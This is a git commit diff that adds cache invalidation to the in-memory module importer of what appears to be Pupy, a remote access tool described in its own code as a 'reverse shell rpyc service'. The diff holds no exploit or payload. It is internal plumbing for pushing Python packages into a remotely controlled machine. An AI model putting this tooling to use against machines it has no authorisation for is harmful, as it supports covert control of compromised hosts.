Properly invalidate cache during forced package loading

This commit is contained in:
Oleksii Shevchuk 2017-01-06 19:55:06 +02:00
parent 638a6469a1
commit 1a3ad7bb60
3 changed files with 50 additions and 22 deletions

View File

@ -32,6 +32,7 @@ except ImportError:
builtin_memimporter = False
modules = {}
try:
import pupy
if not (hasattr(pupy, 'pseudo') and pupy.pseudo) and not modules:
@ -61,10 +62,21 @@ def pupy_add_package(pkdic):
module = cPickle.loads(pkdic)
if __debug:
print 'Adding package: {}'.format([ x for x in module.iterkeys() ])
print 'Adding files: {}'.format([ x for x in module.iterkeys() ])
modules.update(module)
def has_module(name):
global module
return name in sys.modules
def invalidate_module(name):
global module
if not name in sys.modules:
raise ValueError('Module {} is not loaded yet'.format(name))
del sys.modules[name]
def native_import(name):
__import__(name)
@ -83,6 +95,7 @@ class PupyPackageLoader:
dprint('loading module {}'.format(fullname))
if fullname in sys.modules:
return sys.modules[fullname]
mod=None
c=None
if self.extension=="py":
@ -132,17 +145,15 @@ class PupyPackageLoader:
'Error while loading package {} ({}) : {}'.format(
fullname, self.extension, str(e)))
raise e
finally:
imp.release_lock()
mod = sys.modules[fullname] # reread the module in case it changed itself
return mod
return sys.modules[fullname]
class PupyPackageFinder:
def __init__(self, modules):
self.modules = modules
self.modules_list=[
x.rsplit(".",1)[0] for x in self.modules.iterkeys()
]
def find_module(self, fullname, path=None):
imp.acquire_lock()
@ -201,7 +212,9 @@ class PupyPackageFinder:
dprint('--> Loading {} ({}) package={}'.format(
fullname, selected, is_pkg))
return PupyPackageLoader(fullname, content, extension, is_pkg, selected)
except Exception as e:
raise e
finally:

View File

@ -113,6 +113,13 @@ REVERSE_SLAVE_CONF = dict(
instantiate_oldstyle_exceptions=True,
)
class UpdatableModuleNamespace(ModuleNamespace):
__slots__ = ['__invalidate__']
def __invalidate__(self, name):
cache = self._ModuleNamespace__cache
if name in cache:
del cache[name]
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
@ -121,7 +128,8 @@ class ReverseSlaveService(Service):
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF)
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
self._conn.root.set_modules(
UpdatableModuleNamespace(self.exposed_getmodule))
def on_disconnect(self):
print "disconnecting !"
@ -179,7 +187,8 @@ class BindSlaveService(ReverseSlaveService):
self._conn.close()
raise KeyboardInterrupt("wrong password")
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
self._conn.root.set_modules(
UpdatableModuleNamespace(self.exposed_getmodule))
def get_next_wait(attempt):

View File

@ -305,8 +305,16 @@ class PupyClient(object):
"""
# start path should only use "/" as separator
if module_name in self.conn.modules.sys.modules and not force:
update = False
pupyimporter = self.conn.modules.pupyimporter
if pupyimporter.has_module(module_name):
if not force:
return
else:
update = True
pupyimporter.invalidate_module(module_name)
start_path=module_name.replace(".", "/")
package_found=False
@ -334,8 +342,6 @@ class PupyClient(object):
except Exception as e:
raise PupyModuleError("Error while loading package from sys.path %s : %s"%(module_name, traceback.format_exc()))
if "pupyimporter" not in self.conn.modules.sys.modules:
raise PupyModuleError("pupyimporter module does not exists on the remote side !")
if not modules_dic:
if self.desc['native']:
@ -343,20 +349,20 @@ class PupyClient(object):
module_name, repr(self.get_packages_path())))
else:
try:
self.conn.modules.pupyimporter.native_import(module_name)
pupyimporter.native_import(module_name)
except Exception as e:
raise PupyModuleError("Couldn't find package {} in \(path={}) and sys.path / python = {}".format(
module_name, repr(self.get_packages_path()), e))
if force or ( module_name not in self.conn.modules.sys.modules ):
self.conn.modules.pupyimporter.pupy_add_package(cPickle.dumps(modules_dic)) # we have to pickle the dic for two reasons : because the remote side is not aut0horized to iterate/access to the dictionary declared on this side and because it is more efficient
# we have to pickle the dic for two reasons : because the remote side is
# not aut0horized to iterate/access to the dictionary declared on this
# side and because it is more efficient
pupyimporter.pupy_add_package(cPickle.dumps(modules_dic))
logging.debug("package %s loaded on %s from path=%s"%(module_name, self.short_name(), package_path))
if force and module_name in self.conn.modules.sys.modules:
self.conn.modules.sys.modules.pop(module_name)
logging.debug("package removed from sys.modules to force reloading")
return True
if update:
self.conn.modules.__invalidate__(module_name)
return False
return True
def run_module(self, module_name, args):
""" start a module on this unique client and return the corresponding job """